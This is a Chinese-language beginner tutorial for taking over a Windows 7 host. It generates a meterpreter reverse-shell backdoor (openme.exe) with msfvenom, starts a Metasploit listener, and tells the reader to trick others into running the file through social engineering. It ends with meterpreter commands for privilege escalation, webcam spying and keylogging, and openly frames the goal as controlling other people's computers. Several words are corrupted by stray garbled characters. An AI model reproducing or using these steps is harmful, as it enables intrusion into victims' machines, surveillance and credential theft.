这是一个简单渗透技术教程,适合对黑客技术感兴趣的新手,通过这个教程你可以渗透网路中win7系统主机。不多说,直接进入主题。
工具/原料
kaliLinux系统(IP:10.10.10.128)(或者BT5)
win7系统(IP:10.10.10.129)
方法/步骤
1、首先在kali上制作一个后门程序。文件名为:openme.exe命令:msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.10.10.128LPORT=50000-fexe-oopenme.exe#本地监听地址及端口号:10.10.10.128:50000
2、为生成的文件openme.exe赋予可执行的权限,如果有必要可以对该文件执行免杀命令:chmod777openme.exe
3、打开msf,加载exploit/multi/handler模块,同时设置本地主机地址,本地端口命令:msfconsolemsf>useexploit/multi/handlermsfexploit(handler)>setlhost10.10.10.128msfexploit(handler)>setlport50000
4、开始执行渗透攻击并监听命令:msfexploit(handler)>exploit-z-j
5、此时,你可以将文件发给其他人,利用社会工程学知识让别人在他的win7系统上打开该文件,那么你的目的就达到了下面就是我在win7虚拟机中的文件,然后运行该文件
6、后门程序反向连接到msf,ms酆璁冻嘌f发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。如图拉慝盐後你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell,还有session信息。命令:msfexploit(handler)>sessionsmsfexploit(handler)>sessions-i1meterpreter>shell
7、最后恭喜你就这样hacked别人的嘛术铹砾win7系统,如果你进一步学习Windows系统下的命令行操作,你就可以随意控制别人的主机了。下面附上mete鸡堕樱陨rpreter常用的命令getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景,需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘